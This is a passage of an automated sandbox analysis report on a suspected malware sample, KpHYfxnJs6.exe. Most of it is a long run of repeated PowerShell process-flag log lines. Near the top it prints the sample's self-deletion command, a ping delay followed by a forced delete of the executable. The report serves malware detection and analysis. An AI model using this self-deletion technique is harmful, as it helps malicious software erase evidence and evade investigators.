              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Self deletion via cmd or bat file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe""
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe""Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
